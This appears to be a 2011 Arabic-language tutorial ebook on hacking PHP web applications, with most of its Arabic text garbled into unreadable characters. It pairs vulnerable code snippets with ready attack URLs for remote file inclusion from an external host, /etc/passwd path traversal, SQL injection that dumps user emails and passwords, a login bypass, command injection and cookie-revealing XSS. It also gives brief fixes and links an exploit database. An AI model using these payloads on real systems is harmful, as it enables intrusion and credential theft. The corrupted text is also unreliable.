كتاب عالم الثغرات

http://www.the-code.
tk
‫ ا
ا ا‬
‫ اات‬ 2012 ‫اآف و ال اات‬
(Adel SBM)
www.the-code.tk
Adel SBM َ: #$%&

http://www.the-code.tk
$'‫ ا* ا')( ا‬+,
6‫ ال آ‬5;‫ا أر‬8, -$)./ ‫ح‬1‫ و‬23.1 -4‫ا‬5)‫ ا‬6)7‫ا ا‬8‫ه‬

>15/71
>G$G‫ ا‬-H‫ا‬5)‫اف ا‬DF‫م ا‬D ‫أي‬, $A‫ ا‬2B ‫ا ا?ب‬8‫( ه‬1
.. D'‫ا‬5‫و ا‬D7‫ ا‬I/ J$‫واآ‬
.M/, DH 23‫ــ إ‬F‫ــ‬/‫ا‬
:‫اهاء‬
Bek4ever-ahmed.bak-THe Don :‫أهي ها ا
ا ا ا اا‬
:*+ ,- ‫وا آ‬
Indoushka – Over-X - Ayme NDz
:‫*ت‬:;-
http://www.noor7.com/
http://www.4algeria.com/vb
http://www.sa-hacker.com/vb/
http://www.gaza-hacker.com/cc
N‫ا‬J.‫ا‬
2011/10/23
:‫س‬FP‫ا‬
>1DG1 (
F;R3 2‫دوات ا‬T‫( ا‬1
:(D$7, #/1 ‫ء أو ادراج‬D‫ )ا‬Remote File Inclusion ‫ة‬V (2
2‫ل أ‬1 -- 1-2
‫م‬DG1 ‫ل‬1 -- 2-2
-$H‫> ا‬$P$‫ آ‬-- 3-2
:(2/R1 #/1 6$)R&/‫اءة‬H/#‫ )آ‬Local File Disclosure/Download ‫ة‬V (3
2‫ل أ‬1 -- 1-3
‫م‬DG1 ‫ل‬1 -- 2-3
-$H‫> ا‬$P$‫ آ‬-- 3-3
:(‫ت‬3$l‫ ا‬D‫ا‬5H (G') SQL Injection ‫ة‬V (4
2‫ل أ‬1 -- 1-4
‫م‬DG1 ‫ل‬1 -- 2-4
(‫ل‬5pD‫ ا‬6$.+& ‫وز‬.& ) SQL Injection Login Bypass-- 3-4
-$H‫> ا‬$P$‫ آ‬-- 4-4
:(1‫وا‬T‫ ا‬8$Pv&) Remote Command Execution ‫ة‬V (5
2‫ل أ‬1 -- 1-5
‫م‬DG1 ‫ل‬1 -- 2-5
-$H‫> ا‬$P$‫ آ‬-- 3-5
:(JAVA SCRIPT ‫ أو‬HTML ‫اد‬5‫( أآ‬G') Cross-Site Scripting ‫ة‬V (6
2‫ل أ‬1 -- 1-6
-$H‫> ا‬$P$‫ آ‬-- 2-6
(‫ت‬3$l‫ ا‬D‫ا‬5H ‫)> و‬F)‫ت ا‬P/)‫اءة ا‬H ‫ و‬6$)R&) Download Backups+ INC files ‫ة‬V (7
>/1‫أ‬+‫ ح‬-- 1-7
-$H‫> ا‬$P$‫ آ‬-- 2-7
:(>)R‫ ا‬-H‫ا‬51 (1) ‫ل اات‬5' >/1‫( أ‬8
>)&p (
‫‪http://www.the-code.tk‬‬
‫‪:>1DG1‬‬
‫آ‪$‬ا ‪ > ( -)+3 1‬ا‪ PHP >.1l‬و أ‪53‬اع اات ا)‪ >/)R‬و ا‪ (1 vv?)& 2‬ا‪p‬اق ا)‪H5‬ـ‪-‬‬
‫ا)ب‪.‬‬
‫و'‪ 2B ?P3 ($‬ه‪8‬ا ا)‪.‬ـل ')ـ ‪3‬ـ‪ 6‬إـ‪?B I‬ـة أن اـة ‪)F1‬ـ آـن ‪F53‬ـ أو ‪F.1,‬ـ‪B.‬ـن‬
‫اآ‪ FB‬ه‪ 5‬أ‪ 7 1‬و ‪ ,‬ا‪...D$G7‬‬
‫‪ 2B -‬ا?‪ (1 $‬ا)ات و أ‪ 3‬أ&‪51 P‬ا‪ -H‬ا‪?F‬ـ أ;ـ‪ D‬أن ه‪v‬ـك ا?‪$‬ـ ‪1‬ـ( ا)‪A‬ـ‪B ($‬ـ‪ 2‬هـ‪8‬ا‬
‫ا)‪.‬ل ‪?R #‬ون ا)‪15/7‬ـت ‪p‬ـ> ‪)$B‬ـ ‪/7‬ـ ‪,‬ـات ال ‪lB PHP‬ـ ?‪P‬ـ‪5‬ن ‪,‬ـح‬
‫ال و ‪.‬ه‪5/‬ن ح ‪ >G‬اآف‪.‬‬
‫إذن ‪ (1‬ان ‪DB‬ا &‪ D.v+‬أو &‪ /‬ا)‪D+‬ة ‪ (1‬أ'‪ #?& 2? D‬و &‪ 6+‬اات‪.‬‬
‫‪ 2B 2v3T‬ه‪8‬ا ا?ب ‪%‬ح آ‪ >$P$‬اآف اة و ا‪..F‬‬

‫و‪5?$‬ن اح ‪ >/1%, 15D1‬أ‪ >$‬و أ‪. 1 53 >1DG1 >/1‬‬
F;R3 2‫دوات ا‬T‫( ا‬1
‫ف‬7 1 M$l& ‫ أي‬MySQL ‫ و‬PHP D 13, M$l& 5‫ ه‬I‫و‬T‫ة ا‬5A‫ ا‬8‫ ه‬2B v1 ‫ب‬5/)‫ا‬
.3JF; I/ LOCALHOST (2/R)‫دم ا‬A‫ )ا‬2/R)‫ ا‬B+,
‫ت‬D7‫ ا‬7, ‫ ا;اء‬. M$l‫ ا‬D7, ، ‫ ا)ل‬6$l I/ APPSERVE ‫ أو‬WAMP 13, M$l& v?)
I‫ج ا‬R& ‫ ات‬/‫ن أ‬T php.ini (5?‫ ا‬#/1 6D7, ‫ وذ‬2/R)‫دم ا‬A‫ ا‬I/ >$+l‫ا‬
.$R‫ ا‬6?, FG$l ‫وط‬
: 2/ )‫ن آ‬5?& $R, FD ‫ و‬php.ini #/1 2B >$‫ت ا‬15/7)‫ ( ا‬R,‫ا‬
safe_mode = off
register_globals = on
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
short_tag_open = on
display_errors = on
disabled_functions = N/A
‫ ال‬1‫ا‬, #/A1 6lH (1 F1‫ا‬DA ‫ت‬3$, ‫ة‬DH ‫ء‬3‫ إ‬، ‫ أو‬: >$&‫ات ا‬5A‫ع ا‬l&‫ ا‬. 6D7‫ ا‬D7,
. ‫ت‬,?+, ‫ف‬7 1 ‫ أو‬PHP
.P)‫ا> ا‬5, ‫ره‬lp, H‫ و‬-‫اده‬5‫ره –أآ‬D1 >‫ درا‬2B ‫ء‬D,‫> و ا‬P/A1 ‫ت‬,? MlV ، $3V
http://www.the-code.tk/code.php?id=96 :v‫ه ه‬D.& APPSERVE ‫ أو‬WAMP 13, 6$)R& ¡,‫روا‬
!!!‫ل اات‬5' ¦$ ‫ أف‬3‫أ‬... ‫ت؟‬,?+‫ ا‬8‫ درا> ه‬2vv?) #$‫ آ‬: 6N+& ‫ ان‬M3‫ أ‬-
.F‫ا‬..D$‫ اآف اات و أآ‬I‫ ا‬/v3 $‫ ه‬/G& ‫ل‬5H‫أ‬
:(D$7, #/1 ‫ء أو ادراج‬D‫ )ا‬Remote File Inclusion ‫ة‬V (2
‫ن ت أو‬5?& 1 l 2‫> وا‬$;‫ر‬p ‫ت‬P/1 ‫ء‬D‫( ا‬1 v?)& F3‫ أ‬$R, ‫ا‬D; 4‫ اة وا‬8‫دور ه‬
.;F)/ >l+v, ‫اق‬p‫ت ا‬,?
.F$‫( ا‬$.1l)‫( ا‬P ‫درة وذ‬3 $' Fv?‫ اات و‬p‫( ا‬1 l7& F3‫ آ) أ‬-
: 2‫ث اة وه‬DR& DH 2‫ و ا‬#/)‫ء ا‬D‫> ا‬$/) ;& ‫ أن‬Fv?) ‫ث دوال‬V D;5& PHP ‫ > ال‬2B
require – require()
require_once
include
include_once
:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-2
:2‫د ا‬5?‫ي ا‬5R test.php #/1 vD ‫ض أن‬Pv --
<?php
$pagina=$_GET['pagina'];
include $pagina;
?>
‫ن‬5? )N‫ دا‬PHP > 2B $)‫ و ا‬$pagina $)‫ ا‬2D+& include >‫ا‬D‫ا‬. ‫ر‬p, ‫د‬5?‫ح ا‬v
(PHP ‫ت‬$‫ أ‬7, I‫ ا‬-;& ‫ أن‬2p‫ أو أ‬$/) $ ‫ور‬D‫ ا‬J1, H5l+1
http://127.0.0.1/test.php M33‫ ا‬P), ªRP& ‫ و‬#/)‫ ا‬-B, v)H ‫ إذا‬-
: >RP‫ ا‬2B ‫ء‬p‫ة أ‬D ‫د‬5;‫'« و‬v
:(WAMP ‫دم‬p 6)7‫ أ‬3‫ )أ‬%A‫ا ا‬8‫ ه‬61
Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2
.include >‫ا‬D/ >l+v, B71 $ ‫ أو‬5F.1 ‫ال‬J $pagina $)‫ أن ا‬5‫ ه‬%A‫ ا‬l-
‫اق‬p‫ ا‬M,? ‫ أو‬6/ ,‫ن را‬5?& 2‫( و ا‬R3 ‫ده‬DR3 >)$H $)‫ ا‬273 1Dv ‫ن‬5? ‫وال‬
:6?‫ا ا‬8F,‫ و‬P)‫ا> ا‬5, ‫ا‬8‫ن ه‬5?‫و‬
http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt?
-4‫ و‬F)‫( ا‬1 ‫ و أ‬TXT 23 #/1 >$, ‫ن‬5? ‫ أن‬. ‫ء‬D‫ي & ا‬8‫ ا‬6‫ أن ا‬I+v&
. ¡,‫> اا‬F3 2B ‫م‬FP‫> ا‬1
‫¡ ال؟‬,‫> را‬F3 2B ٪ 00 ‫م ؟ أو‬FP‫> ا‬1 -4‫ و‬. ‫ن )ذا‬5/N+ ‫ون‬$?‫ا‬

:‫ا ا)ل‬8‫ل ه‬p (1 FP? >,;‫ا‬-
<?php
include $pagina.'.php';
?>
: (‫م‬FP‫> ا‬1 -4‫ون و‬D,) 6‫ ا‬v$D‫ اذا ا‬--
http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt
http://the-code.tk/evilscript.txt.php ¯v‫ ا‬6)$ ‫ء‬D‫ن ا‬T .v (
‫ت‬B4‫ز و ا‬51‫ ا‬6‫ه‬.& 2? ‫¡ ال‬,‫ را‬D7, ‫م ؟‬FP‫> ا‬1 ‫ أو‬00 ٪ #$3 ‫ف‬5 8
.6‫ ا‬F±$‫¡ او ادراج و‬,‫> ا‬$/) .v 2,‫ و‬ID+)‫ ا‬$)‫ ا‬D7, ‫ن‬5?& 2‫ا‬
:‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-2
.M,? (1 ‫ل‬1 ‫ان‬
:(index.php #/1) ‫د ا)ب‬5?‫( ا‬1 #G1 -
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
>)$H ‫ أي‬/$ 15) ;F)‫" و ا‬main_content" $)‫ا> ا‬5, 6‫ ا‬2D+3 ‫ أن‬vv?)
REQUEST /‫ دا> ا‬6P, $)/ ‫ده‬DR
:2&‫ن آ‬5?$ ‫وال‬

http://127.0.0.1/index.php?main_content=http://the-code.tk/evilscript.txt?
.‫ح‬.v, 6‫ء ا‬D‫ ا‬$ 2,‫و‬
6G3 ‫ل‬5‫آ‬5&‫و‬, ‫" أو‬HTTPS" ‫ام‬DA‫ب ا‬.3 ‫" )?( أن‬HTTP" 6lG& ‫ص‬5v‫ ا‬7, :>±'1
"FTP"‫ت‬P/)‫ا‬
:-$H‫> ا‬$P$‫ – آ‬3-2
.‫ات‬$)‫ ا‬2B "/" 61 ‫ت‬17‫ز و ا‬51‫ام ا‬DA, )+& - : >$+, ‫ق‬
.>B71 ‫ات‬$)‫ ا‬6‫ آ‬67.& ‫ء و 'ول أن‬pT‫ ( ا‬R,‫ا‬-
#/1 6$)R&/‫اءة‬H/#‫ )آ‬Local File Inclusion/Download ‫ة‬V (3

:(2/R1
.F/$)R& I' ‫ و‬، ‫ف‬DF+)‫ ا‬-H5)‫ت ا‬P/1 ‫ى‬5R1 ‫اءة‬H v?) ‫ اة‬8‫ل ه‬p (1 ª3B >+, 6?,
: ‫ت‬P/)‫اءة ا‬G, )+& 2‫وال ا‬D‫ ا‬7,
file_get_contents : 61‫ آ‬#/1 ‫اةة‬H

readfile :#/1 ‫اءة‬H
file : >B5P1 2B ‫ة‬1 61‫ آ‬#/1 ‫اءة‬H
fopen : ¡,‫ أو را‬#/1 B
highlight_file() - show_source : #/)‫> أو ا‬RP‫د ا‬5‫آ‬-‫ت‬5R1/‫رس‬5 ‫ض‬
:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-3
:2‫د ا‬5?‫ي ا‬5R test.php #/1 vD ‫ض أن‬Pv --
<?php
readfile($pagina);
?>
$pagina $), ‫د‬DR)‫ ا‬#/)‫ى ا‬5R1 ‫اءة‬H readfile >‫ا‬D‫ول ا‬R . ‫ر‬p, ‫د‬5?‫ح ا‬v
‫ول‬R$ ‫ل‬R‫> ا‬7$l, ‫ق‬A)‫ و ا‬ª&‫اء‬H ‫ ا)اد‬#/)‫ر ا‬+1 DDR, ‫م‬5Gv ‫ ال‬2B 2,‫و‬
‫ت‬Dv) >l+v, config.php #/1 61 ‫اق‬p‫ت ا‬15/71 ‫ي‬5R& 2‫)> و ا‬F)‫ت ا‬P/)‫اءة ا‬H
: vBulletin
:6?‫ا ا‬8F, ‫ن‬5?$ ‫ال‬
http://127.0.0.1/test.php?pagina=../../../../../etc/passwd
..‫رج‬A‫( ا‬1 ‫ء‬D‫· ا‬$ ‫اءة و‬G/ #/)‫ ا‬/ $ 2,‫و‬
. M,?+‫ت ا‬35?1 +' $‫ و‬ª&‫اء‬H ‫ ا)اد‬#/)‫ر ا‬+1 2‫ ه‬../../../../../etc/passwd‫و‬
: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-3
download.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1 ‫ان‬

:‫د ا)ب‬5?‫( ا‬1 #G1 -
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];

header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");

@readfile($file);
die();
2B F± ‫ي‬8‫ ا‬.$ _REQUEST >‫ا‬5, ªl/ &‫( و‬1‫ ا‬$ 5‫ب وه‬5/)‫ ا‬#/)‫ ( ا‬l7 $file $)‫ا‬
.‫ول‬T‫ ا‬+‫ا‬
.#/)‫ى ا‬5R1 ‫ى‬3 ‫ أن‬vv?) readfile () >‫ا‬D‫و ( ا‬
: 2‫ن آ‬5? ‫ ال‬2, ‫و‬
http://127.0.0.1/download.php?file=../../../../../../etc/passwd
.‫ح‬.v, ‫ب‬5/)‫ ا‬#/)‫اءة ا‬H (1 (?)3 I'
:-$H‫> ا‬$P$‫ – آ‬3-3
.‫ات‬$)‫ ا‬2B "/" 61 ‫ت‬17‫ز و ا‬51‫ام ا‬DA, )+& - : >$+, ‫ق‬
.>B71 ‫ات‬$)‫ ا‬6‫ آ‬67.& ‫ء و 'ول أن‬pT‫ ( ا‬R,‫ا‬-
.
:(‫ت‬3$l‫ ا‬D‫ا‬5H (G') SQL Injection ‫ة‬V (4
FT‫ ا‬F3‫> ال آ) أ‬$'3 (1 7T‫ ا‬l7& ‫را و‬3‫آ ا‬T‫ ا‬2‫ ه‬SQL Injection ‫ة‬V ‫ان‬
‫اول‬D.‫ ا‬DDR& (1 >‫ا‬D, F&‫ ا‬2B $HD‫> و ا‬HD, F' ,‫ آ‬R+& ‫ه‬D'5 ‫ اة‬8‫ه‬
-B‫( ر‬1 v?)& 2‫> و ا‬1DG)‫ ا‬6'‫ ا)ا‬V (1 ‫ت و‬3$l‫اج ا‬A‫ ا‬I‫ ا‬5‫> و‬,)‫ة ا‬D)T‫وا‬
.6‫ا‬
:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-4
test.php #/1 (1 (1 #G1 --
<?php
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
‫ه‬D3 2‫ ا‬SQL 1‫( أوا‬GR3 ‫ )?( أن‬v3‫ أ‬2v7 ‫ا‬8‫ ه‬/P1 $ $id $)‫ن ا‬B «'3 )‫آ‬
‫؟‬/P1 $, DH‫ي أ‬81 6N+& DH
1H‫· أر‬$‫> و‬P/A1 ‫ز‬51‫ ور‬SQL 1‫ن أوا‬5? ‫ )?( أن‬ªvGR3 ‫ي‬8‫د ا‬5?‫ أن ا‬2‫ة و ه‬/P‫( ا‬1 /P1 $-
.‫ت‬3$l‫ة ا‬DG ª;5& 1‫ أوا‬6)& ‫وره‬D, ‫ز‬51‫ ا‬8‫¡ وه‬GB
: ‫ر‬p, ‫د اة‬5;‫ ( و‬#?‫> ا‬$P$‫ آ‬-

1 ‫ا‬8‫ة 'وف و ه‬D ‫ ' أو‬J1‫ ر‬2B 6)& >)$H $id $)‫ اء ا‬5‫ ه‬$/1 6‫> آ‬5F+‫ > ا‬2B 1T‫ا‬
:6?‫ا ا‬8F, ‫ن‬5? ‫ي )?( أن‬8‫ و ا‬%A‫ ا‬F±+& 2‫ت ا‬3$l‫ة ا‬DH 2B /p l+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near 'ORDER BY `date` DESC' at line 1
.‫ى‬p‫ أ‬$ ‫ة‬D F %A‫و ر> ا‬
:2/ )‫ن آ‬5?‫> ال و‬$P$‫ آ‬I‫د ا‬573-
http://127.0.0.1/test.php?id=1+union+all+select+1,2,version(),4--
.(3 H‫د ر‬5)7‫ ا‬2B >,‫ت )ا‬3$l‫ة ا‬DH ‫ار‬D‫ ا‬I/ 6Rv v‫وه‬
: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-4
listing_view.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1 ‫ان‬

:‫د ا)ب‬5?‫( ا‬1 #G1 -
$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals
where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
. ‫ة‬/P1 $ Fl/v 2‫)> ا‬$G‫ وا‬itemnr /‫ا> ا‬5, $id $)‫)> ا‬$H D,DR& $ ª3‫'« أ‬3
: 2&T‫> و ذ آ‬5F 6?, SQL ‫( ال‬G' (1 (?)v 2,‫و‬
http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,
3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--
.($1DA+)‫ول ا‬D.‫( ا‬1 ‫)> ا)ور‬/‫ وآ‬23‫ ا?و‬Dl‫ ا‬I/ 6Rv‫و‬
6))‫ ا‬6$P, F'‫ ان أن أ‬2vv?) ‫ا‬8 ‫ اات‬DG‫( أ‬1 2‫ ه‬SQL Injection :>1‫> ه‬±'1
‫ة‬/P‫ ا‬2A& (1 ‫ ال‬6$P& 6‫ آ‬6)$‫ اة و‬8‫ل ه‬5' 1‫ آ‬,‫ر آ‬D% *‫و ان ء ا‬
.6‫ ا‬-B‫ ر‬I‫ ا‬5‫ت و‬15/7)‫اج ا‬A‫ ا‬I‫ا‬
:(‫ل‬5pD‫ ا‬6$.+& ‫وز‬.& ) SQL Injection Login Bypass --3-4
SQL ‫ة‬V (1 ‫ء‬J.‫ آ‬FPv 8 F+l ‫ اات و ذ‬6);‫ و أ‬#p‫( أ‬1 l7& ‫ اة‬8‫ه‬
' or ' 1=1 J1‫) ا‬7+1 ‫'> ادارة‬5 I‫ل ا‬5pD‫( ا‬1 v?)& 2‫ وه‬Injection
:‫ ا)ل‬I/ J‫رآ‬
login.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1
:‫د ا)ب‬5?‫( ا‬1 #G1 -
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND
password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");
: >$‫ت ا‬15/7)‫ ا‬-4‫د و‬.), ‫ل‬5pD‫'> ا‬5 ‫وز‬.& vv?)
admin ' or ' 1=1 : ‫م‬DA+)‫ا ا‬

jocker : +‫)> ا‬/‫آ‬
‫>؟‬+l‫ ا‬8F, SQL ‫ع‬DAv 6‫ ؟ وه‬v5p‫ د‬6.+$ #$‫ل آ‬5Gv v3‫ أ‬D$‫أآ‬
: l+‫ف ا‬7v SQL ‫( ف ال‬1 l$ ‫ي‬8‫ ا‬1T‫ ا‬v±' 5 v3T 73 2‫> ه‬,;‫ا‬
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND
password = ' jocker'")
‫ي‬8‫ ا‬1T‫( &;)> ا‬1 (?)& 2? ‫ت‬3$l‫ ا‬D‫ا‬5H -1 617‫> ا‬G ( ‫?ة‬B D ‫ن‬5?& ‫ أن‬. -
.‫ف‬DF‫ن ا ا‬5? ‫ أن‬. ‫ل‬5pD‫ أن ا ا‬/7‫ ا‬-1 ‫ل‬5pD‫( ا‬1 v?)&‫ و‬SQL ‫ ال‬ª, vDp
: -$H‫> ا‬$P$‫ – آ‬4-4
:‫ا آ)ل‬8‫ ه‬1‫ام ا‬DA, 1H‫¡ أر‬GB F/7;‫ات و ا‬$)‫ ا‬2B ‫وف‬R/ )+& -
$id=(int)$_GET['id'];
: ‫ت‬3$l‫ة ا‬DG /p ‫ث‬DR& 2‫> وا‬A‫وف ا‬R‫ ا‬-v), H ‫أو‬-
-,.()'"_+/*
:(1‫وا‬T‫ ا‬8$Pv&) Remote Command Execution ‫ة‬V (5

)+& 2‫ وه‬Remote file Inclusion ‫ة‬V D7, ‫ة‬V p‫ أ‬23V 2‫ رأ‬+' #v& ‫ اة‬8‫ه‬-
. B$+‫ ا‬I/ ‫ة‬l1 1‫ أوا‬8$Pv,
: 2‫ وه‬1‫وا‬T‫ ا‬$l, )+& 2‫وال ا‬D‫ ا‬7, D;5& PHP ‫ > ال‬2B-
exec
passthru
shell_exec
system
>.$3 ‫ة‬D‫ه‬1 v?) ª3B EXEC() >‫ا‬D, 1‫وا‬T‫ ا‬$l& l ‫ إذا آن ال‬: >±'1 --
.-l& F3‫( اذ أ‬1‫وا‬T‫ ا‬8$Pv& (?‫ )و‬1‫وا‬T‫ا‬
:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-5
test.php #/1 (1 #G1 --
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
$cmd >R‫ ا‬8‫ ه‬2B 5‫ وه‬$)/ >)$H / vv?) #$‫ آ‬vB >G,+‫ل درا> اات ا‬p (1
: 2&T‫ ال آ‬67.3 ‫ أن‬vv?) ªv1‫و‬
http://127.0.0.1/test.php?cmd=id
.>.$v‫ ا‬F±& ‫ف‬5‫( و‬B+‫ ا‬I/ v&$' ‫ ض‬1‫ )أ‬id 1T‫ ا‬8$Pv& $‫و‬
‫اض‬7‫ )ا‬dir 1T‫وز آ‬Dv5‫م ا‬±3 1‫( أوا‬1 1T‫ن ا‬5?$ 2/R)‫ ا‬B+‫ ا‬I/ .‫ '> ا‬2B‫و‬
.(2R‫ ا‬D/.)‫ت ا‬P/1
: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-5
dig.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1
:‫د ا)ب‬5?‫( ا‬1 #G1 -
$ns = $_GET['ns'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig $ns </u></b><br>");
echo '<pre>';
system ("$ns");
$ns $)‫ل ا‬p (1 D 1‫ أي أ‬ª;5 ‫; أن‬F)/ (?) ª3‫ أ‬F± v‫ه‬
: 2&‫ ا‬6?, ª;5$ 1T‫و ا‬
http://127.0.0.1/dig.php?ns=ls -la
:6?‫ا ا‬8F, ‫د‬5‫ آ‬vB‫ د‬5 : >1‫> ه‬B4‫ا‬-

$dz = $_GET['ns'];
$alg = $_GET['alg]; .
........................ etc ........................
system ("dig @$dz $alg");
?>
‫ن ال؟‬5?$ #$‫ رأ آ‬2B
:6?‫ا ا‬8F, ‫ن‬5?$ ‫ ال‬:>,;‫ا‬
http://127.0.0.1/dig.php?dz=|| id ||&alg=ls -la
.D'‫ وا‬MH‫ و‬2B 1‫ة أوا‬D $l ‫م‬DA+ || J1‫ن ا‬T
:(JAVA SCRIPT ‫ أو‬HTML ‫اد‬5‫( أآ‬G') Cross-Site Scripting ‫ة‬V (6
l‫ أآ‬2B ‫ه‬D.& ‫ا و )?( أن‬D; ‫ة‬v1 2FB ‫ا‬8F‫ و‬F35v ‫ اة أو‬8‫ن ه‬5.1l)‫ ا‬6‫ه‬. 1 ‫ا‬$‫آ‬
.>$‫> ذآ‬G, F‫ ا‬I/ ;F)‫رة ا‬DH 2B ()?& F$7B (? >$)7‫ ا‬-H‫ا‬5)‫ا‬
: 2&T‫ ال آ‬67.3 ‫ أن‬vv?) ªv1‫و‬
:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-6
test.php #/1 (1 (1 #G1 --
:‫د ا)ب‬5?‫( ا‬1 #G1 -
<?php
$name=$_GET['name'];
print $name;
?>
print >‫ا‬D‫ا> ا‬5, ªl V (1‫ و‬$name $)/ >)$H / ª3B ‫د‬5?‫ ا‬v);& 5
:6?‫ا ا‬8F, M,? B; ‫د‬5‫( آ‬GR3 5 ‫ رأ‬1 ....... ‫د‬5?‫ا ا‬8‫> ل ه‬G 2B ‫ا‬D$; ?Pv -
http://127.0.0.1/test.php?name=<script>alert(document.cookie)</script>
8‫ ه‬2B v, ‫ص‬A‫ ا‬J$‫آ‬5?‫ ا‬5‫م و ه‬DA+)‫ ا‬J$‫آ‬5‫ي آ‬5R& B; >‫ة ر‬8B3 ‫ر‬5F¹ ‫ن‬5? >.$v‫ا‬
.>R‫ا‬
‫ر‬p‫ أو ا‬$P& V J$‫آ‬5?‫اج ا‬A‫د ا‬5‫ي آ‬5R ¡,‫( را‬5?& >$/) l & ‫اق‬p‫ ق ا‬D'‫ ا‬-
I‫ ا‬6 ª, >A‫ ا‬J$‫آ‬5?‫ت ا‬15/71 ‫ن‬B ¡,‫ا‬/ >$R‫ ا‬P& Dv . >$R‫ ا‬I‫ ا‬ª‫وار‬
.>H‫و‬+)‫ ا‬J$‫آ‬5?‫ت ا‬15/71 +1 >$R‫ب ا‬+' I‫ل ا‬5pD, ‫م‬5G $pT‫ا ا‬8‫; و ه‬F)‫ا‬
: -$H‫> ا‬$P$‫ – آ‬2-6
htmlspecialchars()
‫ أو دا‬htmlentities() >‫)ل دا‬7‫ ا‬vv?) $' ‫ا‬D; >/F -$H‫> ا‬G
. ‫¯ دي‬v‫ آ‬HTML ‫م‬5‫ص و و‬53 >/17), ‫م‬5G& ‫وال‬D‫ ا‬8‫ه‬
:6?‫ا ا‬8F, ‫ن‬5?$ -H)‫د ا‬5?‫ ا‬2,‫و‬
php?>
;(['name=htmlentities($_GET['name$
;print $name
<?
:INC files ‫ة‬V + Download Backups ‫ة‬V (7

: >/1‫أ‬+‫ – ح‬1-7
:$R, ($.1l)/ >;‫ذ‬+‫ء ا‬pT‫( ا‬1 )‫ه‬l‫ أ‬$A
-H5)‫ت ا‬3$, ‫ة‬DG >$$'‫ ا‬º+v‫ ا‬6$)R, )+& : Download Backups ‫ة‬V
.‫ف‬DF+)‫ا‬
:¡$+, ‫ل‬1
http://127.0.0.1/adminpanel/phpmydump.php
‫( ا))?( أن‬1 ‫> و‬B5?1 ‫ن‬5?& 2‫ وا‬inc ‫ت‬P/1 7, ‫اءة‬G, )+&‫ و‬: INC files ‫ة‬V
.‫ف‬DF+)‫ ا‬-H5)‫ت ا‬15/71 ‫ي‬5R&
:(‫ت‬3$l‫ة ا‬DG, ‫ت ا&ل‬15/71 ‫ي‬5R #/1 ‫اءة‬H) ¡$+, ‫ل‬1
http://127.0.0.1/inc/mysql.inc
: -$H‫> ا‬G – 2-7

65R‫> و ا ا‬$$'‫> ا‬A+v‫ ا‬6$)R& D ‫ي‬8‫ ا‬5‫ ه‬D)‫( أن ا‬1 GR‫ ا‬: Download Backups
.>$$'‫ ا‬º+v‫)> ا‬R ‫ري‬3 ‫ار‬D; ‫ام‬DA‫ – ا‬%p >RP I‫ا‬
>$, ‫ت‬P/1 2B ‫ت‬15/7)‫« ا‬P' 5‫ ه‬6BT‫ وا‬.htaccess ‫ام‬DA, ‫ت‬P/)‫ ')> ا‬: INC files
.PHP
:(>)R‫ ا‬-H‫ا‬51 (1) ‫ل اات‬5' >/1‫( أ‬8
Remote File Inclusion ‫ة‬V (1
http://www.1337day.com/exploits/14932
Local File Disclosure/Download ‫ة‬V (2
SQL Injection ‫ة‬V (3
Remote Command Execution ‫ة‬V (4
Cross-Site Scripting ‫ة‬V (5
:>)&p
‫ا‬8‫ ه‬6‫> ال و?( آ‬$P$‫رة و آ‬5A‫ ا‬$' (1 #/A& ‫( اات‬1 ‫اع‬53‫ة أ‬D D;5& ª3‫وف أ‬7)‫( ا‬1
ª3‫ أ‬D‫( ا)»آ‬1 ‫ اات و‬I‫ أآ ا‬,H‫ أن أ‬M‫ 'و‬DG 2p‫أ‬, ªN‫; و ذآ‬F)‫رة ا‬DH I/ D)7
I/ ‫ء‬p‫ أ‬2v1 ‫ ان وردت‬23‫رو‬8‫و ا‬...‫( ا'اف‬1 >1DG1 >/'1 I‫ ا‬M/‫) و‬/‫ت أآ آ‬DF;‫) ا‬/‫آ‬
...6;‫ و‬J * ‫?)ل‬B ‫ى اح‬5+1 I/ ‫ أو‬2N1‫ي أو ا‬5Rv‫ى ا‬5+)‫ا‬
